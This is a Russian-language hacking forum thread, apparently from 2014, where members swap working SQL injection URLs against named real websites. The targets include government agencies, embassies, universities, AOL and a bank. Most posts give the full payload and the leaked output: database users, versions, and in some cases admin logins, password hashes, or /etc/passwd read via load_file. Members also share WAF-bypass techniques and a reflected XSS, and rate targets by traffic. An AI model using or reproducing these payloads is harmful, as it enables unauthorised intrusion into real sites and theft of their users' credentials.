http://sochi-polyana.com/index.php?menu=-16+union+select+concat(user(),0x203a3a20,database( ),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6e3 36d31733c2f666f6e743e)--
krpol@localhost :: krpol
Code:
http://sochisportservice.com/index.php?menu=-16+union+select+concat(user(),0x203a3a20,database( ),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6e3 36d31733c2f666f6e743e)--
dom@localhost :: dom
Code:
http://respekt-avia.ru/?menu=-16+union+select+concat(user(),0x203a3a20,database( ),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6e3 36d31733c2f666f6e743e)--
respekt@localhost :: respekt
Одним словом - дырявая CMS
YaBtr said:
=================================================
Что-то никак не могу найти там таблицу юзеров... Ты сам крутил до конца или нет? Если да то подскажи где юзеры
П.С. Angola Oil Field Supply Services
Code:
http://www.angolaoilfield.com/info.php?info_id=-7+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database()),9,10,11,12,13,14,15+--+
4.1.22-log:aoss@localhost:aoss
GhostW said:
Что-то никак не могу найти там таблицу юзеров... Ты сам крутил до конца или нет? Если да то подскажи где юзеры
Общаться будем через скули
По вопросу: тоже искал, но проверил не все таблицы, сайт не шибко ценный, так что, если что найдешь, будешь молодцом
pr: 5
http://
www.legacy-project.org
/index.php?page=event_detail&eventID=10+and+1=2+union+select+1,version(),3,4+--+
=================================================
Code:
http://www.acnielsen.ru/news.php?news_id=-16+union+select+1,concat(user(),0x203a3a20,databas e(),0x203a3a20,0x3c666f6e7420636f6c6f723d7265643e6 e336d31733c2f666f6e743e),3,4,5,6,7--
u140989@10.8.1.203 :: u140989
Code:
http://www.prostor2000.ru/show_cat.php?catid=-13%27+union+select+1,2,3,concat(user(),0x203a3a20, database(),0x203a3a20,0x3c666f6e7420636f6c6f723d72 65643e6e336d31733c2f666f6e743e),5,6,7,8,9+--+
prostor@localhost :: prostor
Code:
http://www.fond.ru/index.php?menu_id=-370+union+select+concat(0x3a,version(),0x3c63656e7 465723e3c696d67207372633d687474703a2f2f666f72756d2 e616e7469636861742e72752f617661746172732f617661746 1723137353937372e6769663e3c2f63656e7465723e)--
5.1.41-log
тИЦ = 1200, PR = 5
Code:
http://www.irishsanghatrust.ie/news.php?id=-33+union+select+1,version%28%29,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18+--+
5.0.83-community
u1094094_sangha@172.16.5.126
Code:
http://www.raahauges.com/view-news.php?id=-8+union+select+1,2,version%28%29,4,5+--+
5.5.33a-MariaDB
raahauge_cms@raptor13.nextmill.net
Привет узбекскому Локомотиву!
Code:
http://lokomotiv.uz/news.php?id=-794+union+select+@@version,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22--
5.1.68-CLL-LVE
Win32BOT
11.02.2014, 02:55
Code:
http://sorrentosolemare.ru/info.php?info_id=-20+union+select+1,concat_ws(user(),database(),vers ion()),3,4,5,6,7,8+--+
ocheretko
11.02.2014, 07:07
Code:
http://www.lakedirectory.net/page.php?id=2+and+1=0+%20Union%20Select%20%201%20, 2,3,4,5,6,7,8,9,10,11,%20UNHEX(HEX(CONCAT(CHAR(64) ,CHAR(95),CHAR(64),pass,char(59),CHAR(64),CHAR(95) ,CHAR(64))))%20+FROM+lgg.pmd_users%20%20LIMIT%201, 1--
Code:
http://www.lakedirectory.net/page.php?id=2+and+1=0+%20Union%20Select%20%201,2,3 ,4,5,6,7,8,9,10,11,%20UNHEX(HEX(CONCAT(0x5B6B65795 D,load_file(0x2F6574632F706173737764),0x5B6B65795D )))%20--
при переходе происходит редирект на ссылку, которая содержит вывод данных
DezMond™
11.02.2014, 13:01
PR7
http://www.lebenslanges-lernen.at/erasmus_outgoing/index.php?lng=de&sekt=1&txt=hei&eracode=-SOFIA27'+union+select+user(),2,3,4,5,6,7,8,9,10,11 +--+
Кто первый, того и тапки)
http://www.hkyongnuo.com/e-detail.php?ID=2888+union+select+1,version(),3,4,5, 6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40--
MySQL: 5.5.28
PR: 3
http://www.vrijglas.org/detail.php?id=2110+union+select+1,version(),3,4,5, 6,7,8,9,0,11,12--
MySQL: 5.0.95
PR: 3
Jamsho0T
13.02.2014, 11:56
Code:
http://www.lamarelle.fr/news/news.php?id=9+union+select+1,concat_ws%280x3a,user %28%29,version%28%29,database%28%29%29,concat_ws%2 80x3a,login,passwd%29,4%20FROM%20user+--+
PR 2
5.1.66-0+squeeze1-log
#админку не нашел, либо /admin/
Code:
http://www.fangemeinschaft.de/news.php?id=-4564564556+UNION+SELECT+1,2,3,4,5,6,7,8,version%28 %29,10,11,12,13,14,15,16
4.1.22-nmm-1-log
PR 3
Code:
http://www.jackculcay.de/news.php?id=120%27+AND+1=0+UNION+SELECT+1,version% 28%29,3,4,5,6,7,8,9,10+--+
5.5.31-log
pr 1
College of Agriculture California State University, Chico
Code:
http://-www.chicostatefarmstore.com/product-line.php?ID=-12+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10--
WallHack
16.02.2014, 13:02
2 pr
Code:
http://www.retailtherapy.tv/video.php?id=-163+union+select+1,2,3,version(),5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19+--+
4 pr
Code:
http://www.stagenoise.com/video/video.php?id=-37+union+select+1,version(),3+--+
Улыбайся
16.02.2014, 16:22
http://www.crash-cars.ru/docs_ru.php?id=-7+union+select+1,2,3,4,@@version,6+--+
Было просто приятно увидеть Ваш общий баланс:$29,048.04
http://zxtunes.com/software.php?id=-12%27+union+select+1,2,3,4,@@version,6+--+
WallHack
18.02.2014, 18:41
Яндекс тИЦ http://pr-cy.ru/images/bar2.gif 10 Google Page Rank 4
Code:
http://www.heure-exquise.org/video.php?id=-4677+/*!union*/+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36+--+
DezMond™
19.02.2014, 11:33
PR5
http://www.flumroc.ch/de/loesungen/list.php?maincat=-4+union+select+1,user(),3,4+--+
WallHack
21.02.2014, 13:15
Яндекс тИЦ http://pr-cy.ru/images/bar3.gif 40 Google Page Rank 2
Code:
http://www.worldboxing.ru/view_lessons.php?id=99999999%27+union+select+1,use r(),3+--+
Евреи
Code:
http://nameandglory.spb.ru/martirolog.php?&letter=-1'+union+select+concat(user(),0x3a,0x3c666f6e74206 36f6c6f723d7265643e3c623e6e336d31733c2f666f6e743e3 c2f623e)+--+
memorial@localhost
Футбольный клуб "Агара"
Code:
http://www.agarafc.com.ua/news.php?id=-79+union+select+1,2,3,4,5--
WAF так и не обошёл
Code:
http://www.bishopdwenger.com/content.php?id=-1+union+select+concat_ws(0x3a,version(),user(),dat abase()),2--
WallHack
23.02.2014, 09:06
10 Тиц 1 PR
Логин пароль админа
Code:
http://japonavto.ru/newsview.php?id=-10+union+select+1,login,pass,4,5,6+from+admin+--+
Админку не нашёл
Code:
http://zemkadastr45.ru/?content_type=registration'+or+(select+count(*)fro m(SELECT+1+UNION+SELECT+2+UNION+SELECT+3)x+group+b y+concat(mid((select+name+from+users+limit+1),1,64 ),floor(rand(0)*2)))+--+
Админка, логин, хеш пароля
MaxFast said:
Футбольный клуб "Агара"
Code:
http://www.agarafc.com.ua/news.php?id=-79+union+select+1,2,3,4,5--
WAF так и не обошёл
Обходится так:
www.agarafc.com.ua/news.php?id=-79+/*!union*/ select* from (select 1)a join(select version())b join(select 3)c join(select 4)d join(select 5)i join(select 6)f+--+g
nemaniak
24.02.2014, 17:27
rapid4me.com Файлопомойка ~10к трафа
Code:
http://rapid4me.com/?n=-7708' UNION ALL SELECT NULL,concat_ws(0x3a,version(),user(),database()),N ULL,NULL,NULL,NULL,NULL%23
Code:
5.5.28-29.2-log:root@localhost:fileshare_se
k-state.edu PR-7 Alexa-24k ТИЦ-300 ~100k трафа
Code:
http://www.k-state.edu/today/announcement.php?id=-2140'+union+select+concat_ws(0x3a,version(),user() ,database()),2,3,4,5,6,7,8+--+&category=events&referredby=categoryrssfeed
Code:
5.5.13-log:dcm@ome-media2.campus.ksu.edu:dcm
Salaam Somali Bank
Code:
http://salaamsombank.com/pages.php?id=-14+union+select+1,2,version(),4,5,6,7,8,9,10--
5.1.68-community-log
Улыбайся
26.02.2014, 00:55
HTML:
http://www.printer13.ru/product_info.php?id=-12+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12 ,13+--+
comynicator
26.02.2014, 15:52
ttp://www.carldavey.co.uk/article.php?id=-1+union+ select+1,group_concat(schema_name),3,4+from+inform ation_schema.sch emata--
WallHack
26.02.2014, 18:54
Тиц 650 4 pr
Code:
http://ecom.su/news/index.php?id=-1232+UnIon+selECt+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35+--+
Win32BOT
26.02.2014, 20:06
Code:
http://ecom-info.spb.ru/news/index.php?id=-757+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, concat_ws(user(),version(),database()),16,17,18,19 ,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+--+
ТИЦ 600
PR 4
==============================
Code:
http://villa-beliv.com/room.php?id=-4+union+select+1,2,3,4,version(),6,user(),8,9,data base()+--+
=============================
Code:
http://vladdepo.ru/buy.php?id=-47+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11+--+&make=show
psihoz26
28.02.2014, 01:26
Магазин UltraPrice. Компьютеры, комплектующие, ноутбуки, цифровая техника, акустические системы для домашнего кинотеатра. Минск.
Code:
http://www.ultraprice.by/popups/service.php?id=-10+union+select+group_concat(u_name,0x3b,u_passwd) +from+admin_user+limit+0,1+--+
http://img543.imageshack.us/img543/1310/6eqa.png
Code:
http://www.gorod312.ru/press/news/?mode=show&id=-415+union+select+1,2,concat(version(),database(),u ser()),4,5,6,7,8,9,10,11--
5.0.96-loggorod312_rugorod312_ru@zvm30.host.ru
http://novufms.ru/images/logo.jpg
Code:
http://novufms.ru/content.php?id=-14+union+select+1,concat(user(),0x3a,version()),3, 4--
novufms@localhost:5.0.51a-24+lenny5
МУЗЕЙ ВОЙСК ПРОТИВОВОЗДУШНОЙ ОБОРОНЫ
Code:
http://www.mvpvo.ru/inner.php?id=-1+union+select+1,2,concat(user(),0x3a,version()),4 ,5,6,7,8,9,10,11,12--
u67093@10.8.1.199:5.0.95-log
http://i.imgur.com/dUwa5PU.png
Code:
http://www.chel-oblsud.ru/?html=news&nid=-1328+/*!+and(select+1+from(select+count(*),concat((selec t+(select+concat(version(),0x3a,user()))+from+info rmation_schema.tables+limit+0,1),floor(rand(0)*2)) x+from information_schema.tables+group+by+x)a)*/
5.0.95-log:chel-oblsud@localhost1
Code:
http://www.zuppatheatre.com/members.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,version(),us er(),database()),6,7,8,9--
http://i.imgur.com/3oRL07T.png
Code:
http://www.ufmsko.ru/view.php?id=-1+union+select+1,2,concat(user(),0x3a,version()),4 ,5,6,7--
root@localhost:5.0.45
http://i.imgur.com/27gNemX.png
Code:
http://www.ufms72.ru/index.php?catalog=-79'+union+select+1,2,3,concat(version(),0x3a,user( )),5,6,7,8,9,10+--+
5.1.46-log:gb_ufms72@81.177.33.6
AHTNkiller
09.03.2014, 19:05
Помогите доковырять!
http://avtochast. ru/cardescr.php?carid=874&mod=&typeid=-9563+union+select+1,version%28%29,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53
AHTNkiller said:
Помогите доковырять!
http://avtochast. ru/cardescr.php?carid=874&mod=&typeid=-9563+union+select+1,version%28%29,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53
есть специальная тема /thread46016.html
union select (select(@x)from(select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))x),2,3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53+--+
Win32BOT
09.03.2014, 23:54
HTML:
kompromat.flb.ru/material1.phtml?id=-153+union+select+1,concat(version(),0x3a,user()),3 ,4,5,6,7,8,9,10,11+--+
file_priv = Y
ТИЦ (kompromat.flb.ru) 425
ТИЦ (flb.ru) 2700
danil7493
10.03.2014, 17:40
http://www.mhfan.fr/news.php?id=-5+union+select+1,2,3,group_concat(concat_ws(0x3a3a ,pseudo_user,mail_user,mdp_user)),5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+use rs+limit+0,20--
danil7493
10.03.2014, 19:17
http://www.autosystem.com.ua/news.php?id=-7+union+select+1,2,3,concat_ws(0x3a3a3a3a,user(),d atabase(),version()),5,6,7,8+--+
autosystem@web5.1.hosting.efort.com.ua::::autosyst em_nissan::::5.1.68-log
psihoz26
11.03.2014, 02:07
proskater.ru - Самый крупный в Раисие интернет скейтшоп.
ТИЦ 275
PR 3
Code:
POST http://www.proskater.ru/shopping_cart.php?action=update_product
DATA products_id[]=1029188{1}539'+benchmark(20000000,sha1(1))+'&cart_delete[]=1029188{1}539
Code:
Host IP: 89.108.91.9
Web Server: nginx/0.7.65
Powered-by: PHP/5.3.2-1ubuntu4.17
Current DB: db_proskater
Чтобы крутить надо быть залогиненым.
Unknowhacker
20.03.2014, 17:06
Журнал "Родина"
Code:
http://www.istrodina.com/rodina_articul.php3?id=3014&n=142+union+select+1,2,version%28%29+--+
Версия: 4.0.27-log
Arthur C Clarke Institute for Modern Technologies, Katubedda, Moratuwa
Code:
http://www.accimt.ac.lk/news_details.php?id=-13+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12--
zipper_frz said:
Тиц - 0, ПР - 2
http://www.right2lifelanka.org/new/newsview.php?id=138
Code:
http://www.right2lifelanka.org/new/newsview.php?id=-138'+union+select+1,2,concat(user(),database()),4, 5,6,7,8+--+
r2llanka_user@localhostr2llanka_main
RoksHD said:
Code:
http://www.southcrest.org/wp-content/plugins/formcraft/form.php?id=1%20and%20%201=1
Code:
http://legacyera.com/wp-content/plugins/formcraft/form.php?id=1%20and%20%201=1
Code:
http://legacyera.com/wp-content/plugins/formcraft/form.php?id=1+union+all+select+1,2,3,concat(user() ,0x3a,database()),5,6,7,8,9,10,11--
legacy_jordan@localhost:legacy_wp
Code:
http://www.southcrest.org/wp-content/plugins/formcraft/form.php?id=1+union+all+select+1,2,3,concat(user() ,0x3a,database()),5,6,7,8,9,10,11--
southcrestorg@joro.dreamhost.com:southcrest_org
ФК Локомотив Ташкент
Code:
http://lokomotiv.uz/news.php?id=-794+union+select+@@version,2,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22--
Не нашел названия скрипта партнерки и сайт производителя, но на иденичном коде есть крупные проекты:
скрипт: work-task-read.php
переменная:?adv=
запрос:
Code:
-158%27 union select 1,2,concat_ws%280x3a,id,username,password%29,4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from tb_users+limit+1,1+--+
Зависимость: аккаунт в системе.
Живой пример:
_ttp://mvdbux.ru/work-task-read.php?adv=
-158%27%20union%20select%201,2,concat_ws%280x3a,id, username,password%29,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23%20from%20tb_users+limit+0 ,1+--+
Code:
http://www.accimt.ac.lk/news_details.php?id=-13+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12--
unic0rn said:
Code:
http://mfc.edu/event.php?id=-16%27+UNION+SELECT+1,concat_ws%280x3e3e,database%2 8%29,user%28%29%29,3,version%28%29,5,6,7,8+--+
DEPARTMENT OF FINANCIAL STUDIES UNIVERSITY OF DELHI, PR4
Может кому интересно будет, тут присутствует еще одна уязвимость - отраженная XSS:
mfc.edu/event.php?id=-8' union select 1,concat_ws(0x3a,database
%2528
),user()),3,version(),5,6,7,8--
alert(/Antichat/)
HTML:
http://asia-moto.ru/content.php?id=-19+UNION+SELECT+1--
http://stpatsfc.com/news.php?id=-3045+UNION+SELECT+1--
http://naspschools.org/board/board.php?id=-12+UNION+SELECT+1,2,3,4,5,6,7--
http://grandsoleil.net/boat_shows.php?id=-113+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27--
http://www.udc-caraudio.com/news_detail.php?id=-74+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5--
http://listadotren.es/motor/series.php?id=/51
http://weddingawards.com.br/premiacao/jurado-descritivo.php?id=/17
http://www.couleursetnuances.com/realisation.php?id=-14 order/**/by/**/?--
http://kagakribet.com/humor.php?id=-147+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--
kingbeef
11.04.2014, 18:50
Rambler.ru
Code:
http://easystudy.rambler.ru/'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1
HTML:
http://lifelinebatteries.com/distributorpage.php?id=-766+UNION+SELECT+1,2,group_concat(table_name),4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+ from+information_schema.tables--
http://absolutehotelservices.com/press.php?id=-89+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5--
http://peshtigotimes.net/index.php?id=-22462+UNION+SELECT+1,2,3,4,5,group_concat(table_na me),7,8,9,10,11,12,13,14+from+information_schema.t ables--
http://elkage.de/src/public/showterms.php?id=-1751+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51--
http://www.gardencentr.ru/content.php?id=-32+UNION+SELECT+1--
http://www.relaisdesvignerons.com/lire_news.php?id=-36+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14--
http://kotis.org/printer.php?id=-137+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--
http://www.sulapdiyan.com/sulap.php?id=-69+UNION+SELECT+1,2,group_concat(table_name),4+fro m+information_schema.tables--
http://senesco.com/newsitem.php?id=-291+UNION+SELECT+1,2,3,group_concat(table_name),5+ from+information_schema.tables--
http://asaravillaanAdsuite.com/templatelink.php?id=-39+UNION SELECT+1,2,group_concat(table_name),4,5,6,7,8,9,10 +from+information_schema.tables--
http://asaravillaandsuite.com/templatelink.php?id=-39+UNION%20SELECT+1,2,group_concat(table_name),4,5 ,6,7,8,9,10+from+information_schema.tables--
Unknowhacker
14.04.2014, 11:08
Stroika.md
Code:
http://www.stroika.md/detail.php?id=1960+union+select+1,version%28%29,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29+--+
Версия: 5.1.72-2
тИЦ: 40
PR: 3/10
Unknowhacker
20.04.2014, 17:31
Code:
http://hottey.com.ua/a_podarki_prikoly/f_cat/?vtype=big&id_big=1571+union+select+1,version%28%29,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29+--+&page1=1
Версия: 5.1.73-1-log
WallHack
24.04.2014, 18:52
Яндекс тИЦ http://pr-cy.ru/images/bar3.gif 100 Google Page Rank 4
Code:
http://usovi.ru/index.php?page=news_details&news_id=-10%27+union+select+1,2,3,4,5,6,7,8,9,10+--+
WallHack
26.04.2014, 19:03
Яндекс тИЦ http://pr-cy.ru/images/bar2.gif 10 Google Page Rank 1
Мониторинг игровых серверов
Code:
http://www.gamesmonitoring.ru/index.php?page=view&id=-339%27+union+select+1,2,3,4,version(),6,7,8,9,10,1 1,12,13,14,15,16,17,18+--+
Code:
http://pcidatabase.com/vendor_details.php?id=606-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15--
http://redwheelweiser.com/p.php?id=35-999.9+union+select+1,2,3,4,5,6,7,8,9--
http://iop.vast.ac.vn/theor/vtps/news.php?id=2-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11--
http://yccd.am/picture.php?id=85-999.9+union+select+1,2,3,4,5,6--
http://bbtv.az/ru/show.img.php?id=218-999.9+union+select+1,2,3,4,5,6,7,8,9,10--
http://kms.bg/en/news.php?news_id=24-999.9+union+select+1,2,3,4,5,6--
look2009
07.05.2014, 01:09
Code:
http://www.npfpol.ru/cat.php?f=172+UNION+SELECT+1,2,database(),version( ),5,6,user()+--+
4.0.27-log
npfpol10_poly
npfpol10_poly@217.112.37.2
look2009
08.05.2014, 16:45
Code:
http://www.putridflowers.com/music.php?id=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,1 1,12,group_concat(concat_ws(0x3a3a%20,loginid,pass word)),14,15,16,17+FROM+pf_admin+--+
Code:
http://www.cronograf.md/home.php?id=-8+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3,4--
BLurpi^_^
09.05.2014, 15:47
pr: 6
alexa
danil7493
10.05.2014, 10:30
http://www.denysvonarend.com/en/hotel.php?id=-94+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11+--
5.0.96-log:denys@81.171.239.161:denys
BLurpi^_^
11.05.2014, 02:19
http://counter.pr-cy.ru/prcy/www.zolotoy-grad.ru
Code:
http://www.zolotoy-grad.ru/en/page.php
?m_id=999999.9' union all select 1,2,concat(0x7e,0x27,unhex(Hex(cast(user() as char))),0x27,0x7e),4,5 and 'x'='x
psihoz26
12.05.2014, 11:35
А я вот что находил почти год назад
Code:
http://richmedia.aol.com/page1.php/images/demopopup.php?pageid=26&latest=0&s_term=&random=150'
MySQL blind inj
Code:
http://gw-moviefone-dtc02.evip.aol.com/movies/pox/closestshowtimes.xml?zip=00501&id=23765
MySQL blind inj
А эту раскрутил не через обычный хавиж
Code:
http://richmedia.aol.com/demopopup.php?id=12771+Union+select+1,2,3,user(),5 ,6,7,8,9,10,11,12,13,14,15+--+
WallHack
18.05.2014, 10:50
Музей войск противовоздушной обороны
Code:
http://www.mvpvo.ru/inner.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12+--+
Яндекс тИЦ90
Яндекс Каталог Да
Google Page Rank 3/10
DMOZ.org каталог Да
Сайт продажи велосипедов, книги
1)http://www.veloolimp.ru/item.php
POST:
1 union select 1,2,3,4,user(),6,7,8,9,10#
2)http://www.knigi.ru/index.php?action=iffind
POST:
1' union select 1,2,3,user(),5,6,7,8,9#
Embassy of India, Belgium
Code:
http://www.indembassy.be/pages.php?id=-22+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12 ,13--
5.0.95
palec2006
01.06.2014, 05:41
HTML:
http://www.rumahfiqih.com/x.php?id=-1+union+select+1,2,3,4,(select+concat(username,0x3 A,password,0x3A,email,0x3A,level)+from+users+limit +0,1),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24--
kingbeef
01.06.2014, 10:53
Code:
http://spenserians.cath.vt.edu/TextRecord.php?textsid=34360+and+0+union+select+1, 2,3,4,5,6,7,8,9,10,11,12,13,14,15,version(),17,18, 19--+g
Code:
http://www.indianembassy.at/pages.php?id=-18+union+select+1,2,version(),4,5,6,7,8,9,10,11,12 ,13,14,15,16--
5.0.83-community
Code:
http://www.ginosaladini.it/news/leggi.php?id=-74+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19--
DeepBlue7
16.06.2014, 02:32
Code:
http://www.nash.lv/index.php?lang=concat_ws(0x2f,version(),database,u ser())
Code:
http://www.business-jet.ru/new/news.php?id=-656+union+select+1,database(),3,version(),5,6--
кому самолетики?
palec2006
18.06.2014, 19:10
http://www.powerled.ru/pages/id/-1+union+select+1,2,3,4,5,6,7,(select+concat(0x277E ,username,0x3A3A,password,0x7E27)+from+`u38661_neo n`.modx_manager_users+limit+0,1)+,9,10,11,12,13,14--
5.5.28-log
e-neon.ru:ТИЦ:300R:3
http://www.hts.kharkov.ua/news_full.php?id=-1' UNION ALL SELECT NULL,NULL,(SELECT CONCAT_WS(':',status,email,password) FROM `tabadminusers` LIMIT 0,1)%23
Коммунальное предприятие «Харьковские Тепловьiе Сети»
psihoz26
18.06.2014, 21:19
Code:
http://fontanela.geniuz.cz/page.php?lng=en&id_book=-1+union+select+concat('smotri%20ishodnik',load_fil e(0x573a5c2e576562526f6f745c67656e69757a2e637a5c66 6f6e74616e656c615c696e635f636f6e6e6563742e706870)) ,2,3+--+
Code:
http://voentv.mil.by/company.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4--
Code:
http://evreux.catholique.fr/annuaire.php?idpers=-1636+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,concat_ws(0x3a,version(),user() ,database()),22,23,24--
psihoz26
23.06.2014, 18:56
И снова AOL
Code:
http://ariannaonline-huffpost-ewr.evip.aol.com/columns/column.php?id=-345+union+select+1,database(),user(),4,version()+--+
http://www.jh-inst.cas.cz/www/dokument.php?p=-24+union+select+1,2,3,4,5,6,7,8,@@version,10,11,12 ,13,14,15,16,17,18,19
_ttp://my.ukrtelecom.ua/ua/login_login_groovy/dfg'AND(extractvalue(1,concat(0x3a,(select(@@versi on)))))='1
http://www.post[nogoogle]roi.ru/postform/?nproj=q-020-2d'or+1+group+by+concat((select+version()), floor(rand(0)*2))+having+min(0)--+a
Если выкладываете ссылки, пожалуйста, указывайте в посте имя СУБД и её версию.
http://myanmardailypost.com/issue_type.php?issue=-10+union+select+1,2,3,4,5,6,version(),8,9,database (),user(),12,13,14,15,16--
databasemyanmard_user
mysql 5.5.37
Code:
http://leochat.mobi/chatroom.php?id=-29+union+select+@@version--
5.5.35-0+wheezy1
psihoz26
23.07.2014, 20:40
User()=root@localhost
Version()=5.5.31-0+wheezy1
Code:
http://studio-n.by/catalog/item/89)or(ExtractValue(1,concat(0x3a,(mid(load_file(0x 2f6574632f706173737764),1,10))))
Code:
http://www.firagirona.com/participant.php?id=108&cl=-5634+union+select+concat_ws(0x3a,version(),user(), database()),2,3,4,5,6,7,8,9,10,11,12,13--
Code:
5.0.51a-24+lenny5-log:firagirona@localhost:firagirona
Code:
http://www.skyline72.ru/gallery.php?id=-3+union+select+1,concat(version(),0x3a,user()),3,4--
Code:
5.1.66-LOG:HOST1222787@LOCALHOST
psihoz26
24.07.2014, 20:18
Code:
http://www.musiq1.tv/index.php?site=newsky&vid=-2128%20UNION%20SELECT%201,2,3,4,(select(@x)from(se lect(@x:=0x00),(select(0)from(information_schema.c olumns)where(table_schema!=0x696e66f76d6174496f6e5 f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e ,table_schema,0x2e,table_name,0x3a,column_name)))) x),6,7,8,9,10,11,12,13,14--
psihoz26
24.07.2014, 20:54
Code:
http://www.sostrader.it/sostrader/comunicati_show.cfm?id=-854+union+select+1,2,3,user(),5,6,7,8,9,10,11,12
PS Кто не зальется тот лох
Code:
http://uni-dance.ru/news.php?id=-86+union+select+1,2,3,concat(version(),0x3a,user() )--
Code:
4.1.25-log:unidance@fe9.hc.ru
Code:
http://sitetmn.ru/cgi-bin/show.pl?action=view&id=-3+union+select+1,2,3,4,concat_ws(0x3a,database(),v ersion()),6,7,8,9,0,1,2--+f
Code:
host1222787_site:5.1.66-log
Моя первая
DezMond™
11.08.2014, 00:10
PR6
http://www.geologie.ac.at/index.php?id=225&projectid=-16+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25+--+
Code:
http://www.nassnig.org/nass/news.php?id=-584+UNION+SELECT+1,user(),3,version(),database(),6 ,7,8+--+
Nigerian National Assembly
Alexa: 427,927
PR: 6
http://www.msh.ru/gallery.php?did=-3+union+select+1,concat_ws(0x3a,login,password)+fr om+admin
DezMond™
14.08.2014, 02:16
http://www.iaurif.org/index.php?id=615&iaurif_publications_aff%5Betude%5D=-798)+UnIOn/**//**//**//**//**/+/**//**//**//**//**//**//**//**//**//**/SElEcT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51 ,52,53,54,55,56,57,58,59,60+--+&cHash=7e9e071a42e29c23273d4efd70892d43
WallHack
16.08.2014, 14:28
5.5.32-cll
Code:
http://kvadrostyle.ru/page/catalog.php?id=-1633%27+union+select+1,2,@@version,4,5,6,7,8,9,10+--+
Яндекс тИЦ http://pr-cy.ru/static/img/yandex-bar/bar4.gif 250
Code:
http://www.mbc.edu/baldwin-job-board/detail.php?id=1000+AND+1=0+UNION+SELECT+1,2,3,user %28%29,5,6,7,8,9,10,11,12,13,14,15,16,17,18+--+
PR:5
Code:
http://proyectos.diariosur.es/cronica-universitaria/descargar.php?id=-21+UNION+SELECT+1,2,user(),4,5,6,7+--+
MQ: On
FP: Y
Alexa: 9,866
PR: 7
Code:
http://apps.jifsan.umd.edu/portal/courses_pages.php?cid=-18%27+union+select+1,2,user(),database(),5,6,7,8,9 ,10+--+
Alexa: 8,772
PR: 6
Code:
